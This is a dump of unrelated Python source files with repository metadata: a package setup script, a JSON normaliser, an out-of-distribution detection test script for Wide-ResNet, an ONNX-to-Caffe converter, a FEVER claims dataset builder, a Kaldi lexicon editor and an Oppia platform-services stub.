setup.py | Muzix1/newpackage | 0 | 12766411 | from setuptools import setup, find_packages
setup(
name='newpackage',
version='0.10',
packages=find_packages(exclude=['tests*']),
license='MIT',
description='Another EDSA example python packages',
long_description=open('README.md').read(),
install_requirements=['numpy'],
url='https://github.com/Muzix1/newpackage',
author='<NAME>',
author_email='<EMAIL>'
) | 1.179688 | 1 |
db.py | Aida2gl/sg | 0 | 12766412 | #!/usr/bin/env python
import json
import sys
def validate(input):
normalized = normalize_internal(input)
if normalized != input:
sys.stderr.write("Input is not normalized.\n")
sys.exit(1)
def normalize_internal(input):
db = json.loads(input)
string = json.dumps(normalize_db(db), ensure_ascii=False, allow_nan=False, sort_keys=False, indent=2)
return string + "\n"
def normalize(input):
open("db.json", "w").write(normalize_internal(input))
def normalize_db(db):
for (name, normalize_algorithm, sort_key) in [
("workstreams", normalize_workstream, "name"),
("ideas", normalize_workstream_standard_or_idea, "name"),
("biblio", normalize_reference, "title")
]:
db[name] = normalize_list(db[name], normalize_algorithm, sort_key)
return db
def normalize_list(input, normalize_algorithm, sort_key):
output = [normalize_algorithm(item) for item in input]
output.sort(key=lambda item: item[sort_key])
return output
def normalize_workstream(workstream):
return {
"id": workstream["id"],
"name": workstream["name"],
"scope": workstream["scope"],
"editors": normalize_list(workstream["editors"], normalize_person, "name"),
"standards": normalize_list(workstream["standards"], normalize_workstream_standard, "name")
}
def normalize_person(editor):
return {
"name": editor["name"],
"email": editor.get("email", None)
}
def normalize_workstream_standard(document):
output = normalize_workstream_standard_or_idea(document)
output["review_draft_schedule"] = document["review_draft_schedule"]
output["twitter"] = document["twitter"]
return output
def normalize_workstream_standard_or_idea(document):
return {
"name": document["name"],
"href": document["href"],
"description": document["description"],
"authors": normalize_list(document["authors"], normalize_person, "name"),
"reference": document["reference"]
}
def normalize_reference(reference):
output = {
"title": reference["title"],
"href": reference["href"],
"authors": normalize_list(reference["authors"], normalize_person, "name"),
"reference": reference["reference"]
}
if "obsoletedBy" in reference:
output["obsoletedBy"] = reference["obsoletedBy"]
return output
def usage():
sys.stderr.write(
"""Usage: %s [command]
Commands:
* validate -- Checks that db.json is normalized.
* normalize -- Normalizes db.json.
""" % sys.argv[0]
)
sys.exit(0)
def main():
command = None
try:
command = sys.argv[1]
except IndexError:
usage()
if command not in ["validate", "normalize"]:
usage()
else:
input = open("db.json", "r").read()
if command == "validate":
validate(input)
elif command == "normalize":
normalize(input)
else:
assert False, "Unreachable code."
main()
| 2.78125 | 3 |
pydeap/feature_extraction/__init__.py | Wlgls/pyDEAP | 0 | 12766413 | # -*- encoding: utf-8 -*-
'''
@File :__init__.py
@Time :2021/03/28 19:18:16
@Author :wlgls
@Version :1.0
'''
from ._time_domain_features import statistics
from ._time_domain_features import hjorth
from ._time_domain_features import higher_order_crossing
from ._time_domain_features import sevcik_fd
from ._time_domain_features import higuchi_fd
from ._frequency_domain_features import power_spectral_density
from ._frequency_domain_features import bin_power
from ._wavelet_features import wavelet_features | 1.171875 | 1 |
src/test_detection.py | lhj815/wide-resnet.pytorch | 0 | 12766414 | <gh_stars>0
from __future__ import print_function
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
import torch.backends.cudnn as cudnn
import config as cf
import torchvision
import torchvision.transforms as transforms
import os
import sys
import time
import argparse
import datetime
from networks import *
from torch.autograd import Variable
import random
from utils import *
import calculate_log as callog
# Training settings
parser = argparse.ArgumentParser(description='PyTorch CIFAR-10 Training')
parser.add_argument('--lr', default=0.1, type=float, help='learning_rate')
parser.add_argument('--net_type', default='wide-resnet', type=str, help='model')
parser.add_argument('--depth', default=28, type=int, help='depth of model')
parser.add_argument('--widen_factor', default=10, type=int, help='width of model')
parser.add_argument('--dropout', default=0.3, type=float, help='dropout_rate')
parser.add_argument('--dataset', default='cifar10', type=str, help='dataset = [cifar10/cifar100]')
parser.add_argument('--out_dataset', default='SVHN', type=str, help='dataset = [cifar10/cifar100/SVHN/Tiny]')
parser.add_argument('--resume', '-r', action='store_true', help='resume from checkpoint')
parser.add_argument('--testOnly', '-t', action='store_true', help='Test mode with the saved model')
parser.add_argument('--inferOnly', '-infer', action='store_true', help='inference mode with the saved model (without accuracy)')
parser.add_argument('--loss', '-l', default='ce', help='ce / bce / bce_and_ce / temper')
parser.add_argument('--mode', default='sigmoid', help='sigmoid / softmax / etc')
parser.add_argument('--outf', default='./results/test_detection/', help='folder to output images and model checkpoints')
parser.add_argument('--check_point', default=None)
parser.add_argument('--input_preproc_noise_magni', default=None, type=float, help='0.0014')
parser.add_argument('--odin', default=None, type=float, help='1000')
parser.add_argument('--batch_size', default=100, type=int)
args = parser.parse_args()
print(args)
# Hyper Parameter settings
use_cuda = torch.cuda.is_available()
best_acc = 0
start_epoch, num_epochs, batch_size, optim_type = cf.start_epoch, cf.num_epochs, args.batch_size, cf.optim_type
# Setting_Dir
import datetime
args.outf = str(args.outf)
os.makedirs(args.outf)
# Data Uplaod
print('\n[Phase 1] : Data Preparation')
transform_train = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize(cf.mean[args.dataset], cf.std[args.dataset]),
]) # meanstd transformation
transform_test = transforms.Compose([
transforms.Resize(32),
transforms.ToTensor(),
transforms.Normalize(cf.mean[args.dataset], cf.std[args.dataset]),
])
# transform_train = transforms.Compose([
# transforms.RandomCrop(32, padding=4),
# transforms.RandomHorizontalFlip(),
# transforms.ToTensor(),
# ]) # meanstd transformation
# transform_test = transforms.Compose([
# transforms.Resize(32),
# transforms.ToTensor(),
# ])
if(args.dataset == 'cifar10'):
print("| Preparing CIFAR-10 dataset...")
sys.stdout.write("| ")
trainset = torchvision.datasets.CIFAR10(root='../data', train=True, download=True, transform=transform_train)
testset = torchvision.datasets.CIFAR10(root='../data', train=False, download=False, transform=transform_test)
num_classes = 10
elif(args.dataset == 'cifar100'):
print("| Preparing CIFAR-100 dataset...")
sys.stdout.write("| ")
trainset = torchvision.datasets.CIFAR100(root='../data', train=True, download=True, transform=transform_train)
testset = torchvision.datasets.CIFAR100(root='../data', train=False, download=False, transform=transform_test)
num_classes = 100
if (args.out_dataset == 'SVHN'):
print("| Preparing SVHN dataset for out-of-distrib....")
sys.stdout.write("| ")
# trainset = torchvision.datasets.SVHN(root='./data', train=True, download=True, transform=transform_train)
trainset = None
out_testset = torchvision.datasets.SVHN(root='../data', split='test', download=True, transform=transform_test)
nt_test_loader = torch.utils.data.DataLoader(out_testset, batch_size=batch_size, shuffle=False, num_workers=2)
# num_classes = 10
elif (args.out_dataset == 'Tiny'):
print("| Preparing Tiny_ImageNet dataset for out-of-distrib....")
sys.stdout.write("| ")
trainset = None
out_testset = torchvision.datasets.ImageFolder("../data/Imagenet/", transform=transform_test)
nt_test_loader = torch.utils.data.DataLoader(out_testset, batch_size=batch_size, shuffle=False, num_workers=2)
# num_classes = 10
elif (args.out_dataset == 'cifar100'):
print("| Preparing CIFAR-100 dataset for out-of-distrib.......")
sys.stdout.write("| ")
trainset = None
out_testset = torchvision.datasets.CIFAR100(root='../data', train=False, download=True, transform=transform_test)
nt_test_loader = torch.utils.data.DataLoader(out_testset, batch_size=batch_size, shuffle=False, num_workers=2)
# num_classes = 100
elif (args.out_dataset == 'LSUN_resize'):
print("| Preparing LSUN_resize dataset for out-of-distrib....")
sys.stdout.write("| ")
trainset = None
out_testset = torchvision.datasets.ImageFolder("../data/LSUN_resize/", transform=transform_test)
nt_test_loader = torch.utils.data.DataLoader(out_testset, batch_size=batch_size, shuffle=False, num_workers=2)
# num_classes = 10
# trainloader = torch.utils.data.DataLoader(trainset, batch_size=batch_size, shuffle=True, num_workers=2)
testloader = torch.utils.data.DataLoader(testset, batch_size=batch_size, shuffle=False, num_workers=2)
# #####################################################################
# ################ img extract
# transform_extract = transforms.Compose([
# transforms.ToTensor(),
# ])
# # extracter = torchvision.datasets.CIFAR100(root='../data', train=False, download=False, transform=transform_test)
# # extract_loader = torch.utils.data.DataLoader(extracter, batch_size=100, shuffle=False, num_workers=2)
# extracter = torchvision.datasets.ImageFolder("../data/Imagenet/", transform=transform_extract)
# extract_loader = torch.utils.data.DataLoader(extracter, batch_size=100, shuffle=True, num_workers=2)
# import cv2
# for batch_idx, (inputs, targets) in enumerate(extract_loader):
# # inputs = inputs.numpy().transpose(0,2,3,1) * 255
# inputs = inputs.numpy().transpose(0,2,3,1) * 255
# for i in range(len(targets)):
# # print(targets[i].item())
# cv2.imwrite('imgs/Imagenet/%d_%d.png'%(batch_idx, i), cv2.cvtColor(inputs[i], cv2.COLOR_RGB2BGR))
# # cv2.imwrite('imgs/Imagenet/%d_%d.png'%(batch_idx, i), inputs[i])
# # if targets[i].item() == 23 :
# # cv2.imwrite('imgs/sample/%d_%d_%d.png'%(targets[i], batch_idx, i), inputs[i])
# # cv2.imwrite('imgs/sample/%d_%d_%d.png'%(targets[i], batch_idx, i), cv2.cvtColor(inputs[i], cv2.COLOR_RGB2BGR))
# if batch_size * batch_idx > 1000 :
# exit()
# exit()
# ######################################################################
# Return network & file name
def getNetwork(args):
# if args.pretrained == 'wide-resnet':
# net = torch.load('./pretrained/wideresnet100.pth')
# file_name = 'wide-resnet-'+str(args.depth)+'x'+str(args.widen_factor)
if (args.net_type == 'lenet'):
net = LeNet(num_classes)
file_name = 'lenet'
elif (args.net_type == 'vggnet'):
net = VGG(args.depth, num_classes)
file_name = 'vgg-'+str(args.depth)
elif (args.net_type == 'resnet'):
net = ResNet(args.depth, num_classes)
file_name = 'resnet-'+str(args.depth)
elif (args.net_type == 'wide-resnet'):
net = Wide_ResNet(args.depth, num_classes, args.widen_factor, dropRate=args.dropout)
file_name = 'wide-resnet-'+str(args.depth)+'x'+str(args.widen_factor)
else:
print('Error : Network should be either [LeNet / VGGNet / ResNet / Wide_ResNet')
sys.exit(0)
return net, file_name
assert os.path.isdir('checkpoint'), 'Error: No checkpoint directory found!'
_, file_name = getNetwork(args)
if args.check_point is None :
checkpoint = torch.load('./checkpoint/'+args.dataset+os.sep+file_name+'.t7')
else :
checkpoint = torch.load('./checkpoint/{}/{}/{}.t7'.format(args.dataset, args.check_point, os.sep+file_name))
# checkpoint = torch.load('./checkpoint/{}/{}/{}.pth'.format(args.dataset, args.check_point, os.sep+file_name))
# checkpoint = torch.load('./checkpoint/{}/{}/{}.pth'.format(args.dataset, args.check_point, os.sep+file_name),map_location='cuda:1')
net = checkpoint['net']
epoch = checkpoint['epoch']
# net = torch.load('./pretrained/wideresnet100.pth')['net']
# net = ResNet34(num_c=num_classes)
# net.load_state_dict(torch.load('./pretrained/resnet_cifar100.pth', map_location = "cuda:" + str(0)))
# net = torch.load('./pretrained/resnet_cifar100.pth', map_location = "cuda:" + str(0))
if use_cuda:
net.cuda()
# net = torch.nn.DataParallel(net, device_ids=range(torch.cuda.device_count()))
# cudnn.benchmark = True
net.eval()
def generate_target():
net.eval()
correct = 0
total = 0
f1 = open('%s/confidence_Base_In.txt'%args.outf, 'w')
f11 = open('%s/confidence_Base_In_correct.txt'%args.outf, 'w')
f12 = open('%s/confidence_Base_In_wrong.txt'%args.outf, 'w')
f3 = open('%s/confidence_Base_In_sharing_node.txt'%args.outf, 'w')
f5 = open('%s/confidence_Base_In_sharing_node_of_correct_case.txt'%args.outf, 'w')
f7 = open('%s/confidence_Base_In_sharing_node_of_wrong_case.txt'%args.outf, 'w')
f9 = open('%s/confidence_Base_In_softmax_max_and_sharing_node.txt'%args.outf, 'w')
for data, target in testloader:
total += data.size(0)
#vutils.save_image(data, '%s/target_samples.png'%args.outf, normalize=True)
if use_cuda:
data, target = data.cuda(), target.cuda()
# data, target = Variable(data, volatile=True), Variable(target)
data, target = Variable(data, requires_grad = True), Variable(target)
full_output = net(data)
batch_output = full_output[:,:num_classes]
if args.odin is not None :
batch_output /= args.odin
if args.input_preproc_noise_magni is not None :
# print(args.input_preproc_noise_magni)
maxIndexTemp = torch.argmax(batch_output, dim=1)
labels = Variable(maxIndexTemp).cuda()
# labels = target_transform_for_elementwise_bce(labels, 100)
# loss = F.binary_cross_entropy_with_logits(batch_output, labels)
loss = F.cross_entropy(F.softmax(batch_output), labels)
loss.backward()
# Normalizing the gradient to binary in {0, 1}
gradient = torch.ge(data.grad.data, 0)
# gradient = (gradient.float())
gradient = (gradient.float() - 0.5) * 2
# gradient = data.grad.data
# Normalizing the gradient to the same space of image
gradient[0][0] = (gradient[0][0]) / 0.2675
gradient[0][1] = (gradient[0][1]) / 0.2565
gradient[0][2] = (gradient[0][2]) / 0.2761
# gradient[0][0] = (gradient[0][0] )/(63.0/255.0)
# gradient[0][1] = (gradient[0][1] )/(62.1/255.0)
# gradient[0][2] = (gradient[0][2])/(66.7/255.0)
# Adding small perturbations to images
tempInputs = torch.add(data.data, -args.input_preproc_noise_magni, gradient)
batch_output = net(Variable(tempInputs))[:,:num_classes]
if args.odin is not None :
batch_output /= args.odin
# compute the accuracy
max_logit, pred = batch_output.data.max(1)
equal_flag = pred.eq(target.data).cpu()
correct += equal_flag.sum()
for i in range(data.size(0)):
# confidence score: max_y p(y|x)
output = batch_output[i].view(1,-1)
if args.mode == 'sigmoid':
soft_out = F.sigmoid(output)
elif args.mode == 'tanh':
soft_out = F.tanh(output) / 2.0 + 0.5
elif args.mode == 'clamp':
soft_out = torch.clamp(output, min=-10, max=10) / 20.0 + 0.5
elif args.mode == 'softmax':
soft_out = F.softmax(output)
elif args.mode == 'temper':
soft_out = F.softmax((output - max_logit[i])/100.0)
elif args.mode == 'sharing':
output = full_output[i].view(1,-1)
sharing = output[0,-1].view(1,1)
one_max_logit = max_logit[i].view(1,1)
two_logits = torch.cat((one_max_logit, sharing), dim=1)
soft_out = F.softmax(two_logits)
elif args.mode == 'sharing_include_softmax' :
output = full_output[i].view(1,-1)
soft_out = F.softmax(output)
f3.write("{:.4f}\n".format(soft_out[0, num_classes]))
sharing = output[0,-1].view(1,1)
one_max_logit = max_logit[i].view(1,1)
two_logits = torch.cat((one_max_logit, sharing), dim=1)
OOD_node_softmax = F.softmax(two_logits)
f9.write("{:.4f}\n".format(OOD_node_softmax[0, -1]))
elif args.mode == 'sharing_include_sigmoid' :
output = full_output[i].view(1,-1)
soft_out = F.sigmoid(output)
f3.write("{:.4f}\n".format(soft_out[0, num_classes]))
elif args.mode == 'only_sharing_node':
soft_out = 1. - F.sigmoid(output[:,-1]).view(1,-1)
# print(soft_out.size())
# print(soft_out)
# print(torch.max(soft_out.data))
# exit()
elif args.mode == 'sharing_node_print_include_softmax' :
output = full_output[i].view(1,-1)
soft_out = F.softmax(output)
f9.write("{:.4f}\n".format(torch.max(soft_out[:,:num_classes].data)))
sharing = output[0,-1].view(1,1)
one_max_logit = max_logit[i].view(1,1)
two_logits = torch.cat((one_max_logit, sharing), dim=1)
soft_out = (1. - F.softmax(two_logits))[:,-1]
f3.write("{:.4f}\n".format(float(soft_out.data.cpu())))
else :
assert()
soft_out = torch.max(soft_out.data)
f1.write("{}\n".format(soft_out))
if pred[i] != target[i]:
f12.write("{}\n".format(soft_out))
# f7.write("{}\n".format(F.sigmoid(batch_output[i,num_classes]).item()))
else :
f11.write("{}\n".format(soft_out))
# f5.write("{}\n".format(F.sigmoid(batch_output[i,num_classes]).item()))
# f1.write("{}\n".format(F.sigmoid(batch_output[i,num_classes]).item()))
print('\n Final Accuracy: {}/{} ({:.2f}%)\n'.format(correct, total, 100. * float(correct) / float(total)))
return 100. * float(correct) / float(total)
def generate_non_target():
net.eval()
total = 0
f2 = open('%s/confidence_Base_Out.txt'%args.outf, 'w')
f4 = open('%s/confidence_Base_Out_sharing_node.txt'%args.outf, 'w')
f6 = open('%s/confidence_Base_Out_what_infer.txt'%args.outf, 'w')
# f8 = open('%s/confidence_Base_Out_sharing_node.txt'%args.outf, 'w')
f10 = open('%s/confidence_Base_Out_softmax_max_and_sharing_node.txt'%args.outf, 'w')
f12 = open('%s/bag_of_out_of_distrib.txt'%args.outf, 'w')
bags = torch.zeros([num_classes]).cuda()
for data, target in nt_test_loader:
total += data.size(0)
if use_cuda:
data, target = data.cuda(), target.cuda()
# data, target = Variable(data, volatile=True), Variable(target)
data, target = Variable(data, requires_grad = True), Variable(target)
full_output = net(data)
batch_output = full_output[:,:num_classes]
if args.odin is not None :
batch_output /= args.odin
if args.input_preproc_noise_magni is not None :
maxIndexTemp = torch.argmax(batch_output, dim=1)
labels = Variable(maxIndexTemp).cuda()
# labels = target_transform_for_elementwise_bce(labels, 100)
# loss = F.binary_cross_entropy_with_logits(batch_output, labels)
loss = F.cross_entropy(F.softmax(batch_output), labels)
loss.backward()
# Normalizing the gradient to binary in {0, 1}
gradient = torch.ge(data.grad.data, 0)
# gradient = (gradient.float())
gradient = (gradient.float() - 0.5) * 2
# gradient = data.grad.data
# Normalizing the gradient to the same space of image
gradient[0][0] = (gradient[0][0] )/ 0.2675
gradient[0][1] = (gradient[0][1] )/ 0.2565
gradient[0][2] = (gradient[0][2])/ 0.2761
# gradient[0][0] = (gradient[0][0] )/(63.0/255.0)
# gradient[0][1] = (gradient[0][1] )/(62.1/255.0)
# gradient[0][2] = (gradient[0][2])/(66.7/255.0)
# Adding small perturbations to images
tempInputs = torch.add(data.data, -args.input_preproc_noise_magni, gradient)
batch_output = net(Variable(tempInputs))[:,:num_classes]
if args.odin is not None :
batch_output /= args.odin
max_logit, pred = batch_output.data.max(1)
bags += count(pred, num_classes)
for i in range(data.size(0)):
# confidence score: max_y p(y|x)
output = batch_output[i].view(1,-1)
if args.mode == 'sigmoid':
soft_out = F.sigmoid(output)
elif args.mode == 'tanh':
soft_out = F.tanh(output) / 2.0 + 0.5
elif args.mode == 'clamp':
soft_out = torch.clamp(output, min=-10, max=10) / 20.0 + 0.5
elif args.mode == 'softmax':
soft_out = F.softmax(output)
elif args.mode == 'temper':
soft_out = F.softmax((output - max_logit[i])/100.0)
elif args.mode == 'sharing':
output = full_output[i].view(1,-1)
sharing = output[0,-1].view(1,1)
one_max_logit = max_logit[i].view(1,1)
two_logits = torch.cat((one_max_logit, sharing), dim=1)
soft_out = F.softmax(two_logits)
elif args.mode == 'sharing_include_softmax' :
output = full_output[i].view(1,-1)
soft_out = F.softmax(output)
f4.write("{:.4f}\n".format(soft_out[0, num_classes]))
sharing = output[0,-1].view(1,1)
one_max_logit = max_logit[i].view(1,1)
two_logits = torch.cat((one_max_logit, sharing), dim=1)
OOD_node_softmax = F.softmax(two_logits)
f10.write("{:.4f}\n".format(OOD_node_softmax[0, -1]))
elif args.mode == 'sharing_include_sigmoid' :
output = full_output[i].view(1,-1)
soft_out = F.sigmoid(output)
f4.write("{:.4f}\n".format(soft_out[0, num_classes]))
elif args.mode == 'only_sharing_node':
soft_out = 1. - F.sigmoid(output[:,-1]).view(1,-1)
elif args.mode == 'sharing_node_print_include_softmax' :
output = full_output[i].view(1,-1)
soft_out = F.softmax(output)
f10.write("{:.4f}\n".format(torch.max(soft_out[:,:num_classes].data)))
sharing = output[0,-1].view(1,1)
one_max_logit = max_logit[i].view(1,1)
two_logits = torch.cat((one_max_logit, sharing), dim=1)
soft_out = (1. - F.softmax(two_logits))[:,-1]
f4.write("{:.4f}\n".format(float(soft_out.data.cpu())))
else :
assert()
# print(soft_out.sum())
soft_out = torch.max(soft_out.data)
# if pred[i] == 2 or pred[i] == 3 or pred[i] ==5:
# pass
# else :
f2.write("{}\n".format(soft_out))
# f2.write("{}\n".format(F.sigmoid(batch_output[i,num_classes]).item()))
# if soft_out > 0.9 :
f6.write("{}\n".format(pred[i]))
# f8.write("{}\n".format(F.sigmoid(batch_output[i,num_classes]).item()))
f12.write("{}".format(bags.clone().cpu().data.detach().numpy()))
if args.out_dataset == 'cifar100':
if args.mode == 'sigmoid':
mode = 'bce'
elif args.mode == 'softmax':
mode = 'ce'
write_output(batch_output, target, args.outf, 0, num_classes=100, mode=mode, cifar100=True)
print('generate log from in-distribution data')
acc = generate_target()
print('generate log from out-of-distribution data')
generate_non_target()
print('calculate metrics')
callog.metric(args.outf, acc)
| 2.046875 | 2 |
convertCaffe.py | AntiAegis/onnx2caffe | 1 | 12766415 | <filename>convertCaffe.py
#------------------------------------------------------------------------------
# Libraries
#------------------------------------------------------------------------------
import numpy as np
import argparse, sys, caffe, onnx, importlib
from caffe.proto import caffe_pb2
caffe.set_mode_cpu()
from onnx import shape_inference
from onnx2caffe._graph import Graph
import onnx2caffe._operators as cvt
import onnx2caffe._weightloader as wlr
from onnx2caffe._error_utils import ErrorHandling
from onnx2caffe._transformers import ConvAddFuser,ConstantsToInitializers
from collections import OrderedDict
transformers = [
ConstantsToInitializers(),
ConvAddFuser(),
]
#------------------------------------------------------------------------------
# convertToCaffe
#------------------------------------------------------------------------------
def convertToCaffe(graph, prototxt_save_path, caffe_model_save_path):
exist_edges = []
layers = []
exist_nodes = []
err = ErrorHandling()
for i in graph.inputs:
edge_name = i[0]
input_layer = cvt.make_input(i)
layers.append(input_layer)
exist_edges.append(i[0])
graph.channel_dims[edge_name] = graph.shape_dict[edge_name][1]
for id, node in enumerate(graph.nodes):
node_name = node.name
op_type = node.op_type
inputs = node.inputs
inputs_tensor = node.input_tensors
input_non_exist_flag = False
for inp in inputs:
if inp not in exist_edges and inp not in inputs_tensor:
input_non_exist_flag = True
break
if input_non_exist_flag:
continue
if op_type not in cvt._ONNX_NODE_REGISTRY:
err.unsupported_op(node)
continue
converter_fn = cvt._ONNX_NODE_REGISTRY[op_type]
layer = converter_fn(node,graph,err)
if type(layer)==tuple:
for l in layer:
layers.append(l)
else:
layers.append(layer)
outs = node.outputs
for out in outs:
exist_edges.append(out)
net = caffe_pb2.NetParameter()
for id,layer in enumerate(layers):
layers[id] = layer._to_proto()
net.layer.extend(layers)
with open(prototxt_save_path, 'w') as f:
print(net,file=f)
caffe.set_mode_cpu()
deploy = prototxt_save_path
net = caffe.Net(deploy,
caffe.TEST)
for id, node in enumerate(graph.nodes):
node_name = node.name
op_type = node.op_type
inputs = node.inputs
inputs_tensor = node.input_tensors
input_non_exist_flag = False
if op_type not in wlr._ONNX_NODE_REGISTRY:
err.unsupported_op(node)
continue
converter_fn = wlr._ONNX_NODE_REGISTRY[op_type]
converter_fn(net, node, graph, err)
net.save(caffe_model_save_path)
return net
#------------------------------------------------------------------------------
# getGraph
#------------------------------------------------------------------------------
def getGraph(onnx_path):
model = onnx.load(onnx_path)
model = shape_inference.infer_shapes(model)
model_graph = model.graph
graph = Graph.from_onnx(model_graph)
graph = graph.transformed(transformers)
graph.channel_dims = {}
return graph
#------------------------------------------------------------------------------
# Main execution
#------------------------------------------------------------------------------
if __name__ == "__main__":
# Argument parsing
parser = argparse.ArgumentParser(description="Arguments for the script")
parser.add_argument('--onnx_file', type=str, required=True, help='Path to the ONNX file')
args = parser.parse_args()
# Prepare paths
onnx_path = args.onnx_file
prototxt_path = onnx_path.replace(".onnx", ".prototxt")
caffemodel_path = onnx_path.replace(".onnx", ".caffemodel")
# Convert ONNX to Caffe
graph = getGraph(onnx_path)
convertToCaffe(graph, prototxt_path, caffemodel_path)
print("Converted Caffe model is saved at %s and %s" % (prototxt_path, caffemodel_path))
| 2.078125 | 2 |
language/serene/claim_tfds.py | Xtuden-com/language | 1,199 | 12766416 | <gh_stars>1000+
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""TFDS for only claims."""
import json
from language.serene import constants
from language.serene import util
import tensorflow.compat.v2 as tf
import tensorflow_datasets.public_api as tfds
class ClaimDataset(tfds.core.GeneratorBasedBuilder):
"""Claim only datasets for fever, useful for embedding only claims."""
VERSION = tfds.core.Version("0.1.0")
def __init__(
self, *,
fever_train_path = None,
fever_dev_path = None,
data_dir = None,
config=None):
super().__init__(data_dir=data_dir, config=config)
self._fever_train_path = fever_train_path
self._fever_dev_path = fever_dev_path
def _info(self):
return tfds.core.DatasetInfo(
builder=self,
features=tfds.features.FeaturesDict({
"example_id":
tf.string,
"metadata":
tf.string,
"claim_text":
tfds.features.Text(),
"evidence_text":
tfds.features.Text(),
"wikipedia_url":
tfds.features.Text(),
"sentence_id":
tfds.features.Text(),
"scrape_type":
tfds.features.Text(),
"evidence_label":
tfds.features.ClassLabel(
names=constants.EVIDENCE_MATCHING_CLASSES),
"claim_label":
tfds.features.ClassLabel(names=constants.FEVER_CLASSES)
}))
def _split_generators(self, dl_manager):
return [
tfds.core.SplitGenerator(
name=tfds.Split.TRAIN,
gen_kwargs={"filepath": self._fever_train_path}
),
tfds.core.SplitGenerator(
name=tfds.Split.VALIDATION,
gen_kwargs={"filepath": self._fever_dev_path}
)
]
def _generate_examples(self, filepath, **kwargs):
fever_claims = util.read_jsonlines(filepath)
for claim in fever_claims:
claim_id = claim["id"]
claim_text = claim["claim"]
claim_label = claim["label"]
example_id = f"{claim_id}"
yield claim_id, {
"example_id": example_id,
"claim_text": claim_text,
"evidence_text": "",
"wikipedia_url": "",
# Ordinarily, this would (possibly) be concatenated to the evidence
# but since this is claim only, I'm using a null integer value
"sentence_id": "-1",
# This label doesn't matter here since its claim only
"evidence_label": constants.NOT_MATCHING,
"claim_label": claim_label,
"scrape_type": "",
"metadata": json.dumps({
"claim_id": claim_id,
})
}
| 2.109375 | 2 |
kaldi/steps/dict/apply_lexicon_edits.py | ishine/asv-subtools | 370 | 12766417 | #!/usr/bin/env python
# Copyright 2016 <NAME>
# Apache 2.0.
from __future__ import print_function
import argparse
import sys
def GetArgs():
parser = argparse.ArgumentParser(description = "Apply an lexicon edits file (output from subtools/kaldi/steps/dict/select_prons_bayesian.py)to an input lexicon"
"to produce a learned lexicon.",
epilog = "See subtools/kaldi/steps/dict/learn_lexicon_greedy.sh for example")
parser.add_argument("in_lexicon", metavar='<in-lexicon>', type = str,
help = "Input lexicon. Each line must be <word> <phones>.")
parser.add_argument("lexicon_edits_file", metavar='<lexicon-edits-file>', type = str,
help = "Input lexicon edits file containing human-readable & editable"
"pronounciation info. The info for each word is like:"
"------------ an 4086.0 --------------"
"R | Y | 2401.6 | AH N"
"R | Y | 640.8 | AE N"
"P | Y | 1035.5 | IH N"
"R(ef), P(hone-decoding) represents the pronunciation source"
"Y/N means the recommended decision of including this pron or not"
"and the numbers are soft counts accumulated from lattice-align-word outputs. See subtools/kaldi/steps/dict/select_prons_bayesian.py for more details.")
parser.add_argument("out_lexicon", metavar='<out-lexicon>', type = str,
help = "Output lexicon to this file.")
print (' '.join(sys.argv), file=sys.stderr)
args = parser.parse_args()
args = CheckArgs(args)
return args
def CheckArgs(args):
if args.in_lexicon == "-":
args.in_lexicon = sys.stdin
else:
args.in_lexicon_handle = open(args.in_lexicon)
args.lexicon_edits_file_handle = open(args.lexicon_edits_file)
if args.out_lexicon == "-":
args.out_lexicon_handle = sys.stdout
else:
args.out_lexicon_handle = open(args.out_lexicon, "w")
return args
def ReadLexicon(lexicon_file_handle):
lexicon = set()
if lexicon_file_handle:
for line in lexicon_file_handle.readlines():
splits = line.strip().split()
if len(splits) == 0:
continue
if len(splits) < 2:
raise Exception('Invalid format of line ' + line
+ ' in lexicon file.')
word = splits[0]
phones = ' '.join(splits[1:])
lexicon.add((word, phones))
return lexicon
def ApplyLexiconEdits(lexicon, lexicon_edits_file_handle):
if lexicon_edits_file_handle:
for line in lexicon_edits_file_handle.readlines():
# skip all commented lines
if line.startswith('#'):
continue
# read a word from a line like "---- MICROPHONES 200.0 ----".
if line.startswith('---'):
splits = line.strip().strip('-').strip().split()
if len(splits) != 2:
print(splits, file=sys.stderr)
raise Exception('Invalid format of line ' + line
+ ' in lexicon edits file.')
word = splits[0].strip()
else:
# parse the pron and decision 'Y/N' of accepting the pron or not,
# from a line like: 'P | Y | 42.0 | M AY K R AH F OW N Z'
splits = line.split('|')
if len(splits) != 4:
raise Exception('Invalid format of line ' + line
+ ' in lexicon edits file.')
pron = splits[3].strip()
if splits[1].strip() == 'Y':
lexicon.add((word, pron))
elif splits[1].strip() == 'N':
lexicon.discard((word, pron))
else:
raise Exception('Invalid format of line ' + line
+ ' in lexicon edits file.')
return lexicon
def WriteLexicon(lexicon, out_lexicon_handle):
for word, pron in lexicon:
print('{0} {1}'.format(word, pron), file=out_lexicon_handle)
out_lexicon_handle.close()
def Main():
args = GetArgs()
lexicon = ReadLexicon(args.in_lexicon_handle)
ApplyLexiconEdits(lexicon, args.lexicon_edits_file_handle)
WriteLexicon(lexicon, args.out_lexicon_handle)
if __name__ == "__main__":
Main()
| 3 | 3 |
core/platform/platform_services.py | ctao5660/oppia-ml | 3 | 12766418 | # coding: utf-8
#
# Copyright 2017 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Interface for platform services switching."""
import vmconf
class _Gce(object):
"""Provides platform-specific imports related to GCE
(Google Compute Engine).
"""
@classmethod
def import_metadata_services(cls):
"""Imports and returns gce_metadata_services module.
Returns:
module. The gce_metadata_services module.
"""
from core.platform.metadata import gce_metadata_services
return gce_metadata_services
NAME = 'gce'
class Registry(object):
"""Platform-agnostic interface for retrieving platform-specific modules.
"""
